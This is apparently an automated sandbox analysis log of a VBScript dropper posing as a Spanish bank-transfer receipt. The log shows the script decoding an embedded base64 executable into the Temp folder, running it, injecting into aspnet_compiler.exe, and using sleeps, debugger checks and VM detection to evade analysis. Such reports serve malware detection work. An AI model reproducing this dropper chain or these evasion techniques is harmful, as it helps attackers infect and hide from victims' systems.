Source: temp_executable.exe.1.dr, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.1.dr, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.1.dr, AesHelper.cs Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, AesHelper.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.evad.winVBS@5/1@1/1
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Mutant created: NULL
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Binary string: VCGDG76823.pdb source: wscript.exe, 00000001.00000002.2448209205.000001B594E7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2443496915.000001B5945D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2411349967.000001B5940F5000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2414930191.0000000000222000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.1.dr
Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "1", "true");IDictionary.Add("@@", "A");IDictionary.Add("))", "T");IDictionary.Add(";;;", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Keys();IDictionary.Item("@@");IDictionary.Item("))");IDictionary.Item(";;;");IDictionary.Item("...");IDictionary.Item("&&&");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAKl9h7kAAAAAAAAAAOAALgELAQYAAMIAAACSAAAAAAAALuA");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "2");_Stream.Close();IWshShell3.Run("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "1", "true");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\temp_executable.exe");IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\temp_executable.exe")
.NET source code contains method to dynamically call methods (often used by packers)
Source: temp_executable.exe.1.dr, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777258)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777259)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777245))})
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777258)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777259)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777245))})
Binary contains a suspicious time stamp
Source: temp_executable.exe.1.dr Static PE information: 0xB9877DA9 [Mon Aug 20 05:01:29 2068 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_004030E0 push eax; ret 3_2_004030E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0041488D pushfd ; iretd 3_2_0041488F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00401966 push esi; iretd 3_2_00401967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00402179 push ss; retf 3_2_0040213D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0041F1A0 push ss; ret 3_2_0041F1A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0040D4C7 push edx; ret 3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0040D4CD push edx; ret 3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00418DD0 push ebp; ret 3_2_00418DE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0040D589 push edx; ret 3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_004116BB push edi; retf 3_2_004116BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0042373B push es; ret 3_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00413FC3 push edi; ret 3_2_00413FCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_004237B1 push es; ret 3_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E09AD push ecx; mov dword ptr [esp], ecx 3_2_019E09B6
Source: temp_executable.exe.1.dr, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'a4qPf5QYvGf0c', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: temp_executable.exe.1.dr, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'a4qPf5QYvGf0c', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: BC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: 24E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: 44E0000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A5D1C0 rdtsc 3_2_01A5D1C0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe API coverage: 0.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 6796 Thread sleep count: 160 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 6796 Thread sleep count: 320 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 6768 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 6756 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6844 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000001.00000002.2447923290.000001B5945EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#
Source: temp_executable.exe, 00000002.00000002.2439980184.0000000000882000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A5D1C0 rdtsc 3_2_01A5D1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00417663 LdrLoadDll, 3_2_00417663
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019DA197 mov eax, dword ptr fs:[00000030h] 3_2_019DA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019DA197 mov eax, dword ptr fs:[00000030h] 3_2_019DA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019DA197 mov eax, dword ptr fs:[00000030h] 3_2_019DA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A911A4 mov eax, dword ptr fs:[00000030h] 3_2_01A911A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A911A4 mov eax, dword ptr fs:[00000030h] 3_2_01A911A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A911A4 mov eax, dword ptr fs:[00000030h] 3_2_01A911A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A911A4 mov eax, dword ptr fs:[00000030h] 3_2_01A911A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A9C188 mov eax, dword ptr fs:[00000030h] 3_2_01A9C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A9C188 mov eax, dword ptr fs:[00000030h] 3_2_01A9C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A20185 mov eax, dword ptr fs:[00000030h] 3_2_01A20185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FB1B0 mov eax, dword ptr fs:[00000030h] 3_2_019FB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A37190 mov eax, dword ptr fs:[00000030h] 3_2_01A37190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A6019F mov eax, dword ptr fs:[00000030h] 3_2_01A6019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A6019F mov eax, dword ptr fs:[00000030h] 3_2_01A6019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A6019F mov eax, dword ptr fs:[00000030h] 3_2_01A6019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A6019F mov eax, dword ptr fs:[00000030h] 3_2_01A6019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB61E5 mov eax, dword ptr fs:[00000030h] 3_2_01AB61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h] 3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h] 3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h] 3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h] 3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h] 3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h] 3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h] 3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h] 3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h] 3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h] 3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h] 3_2_01A051EF
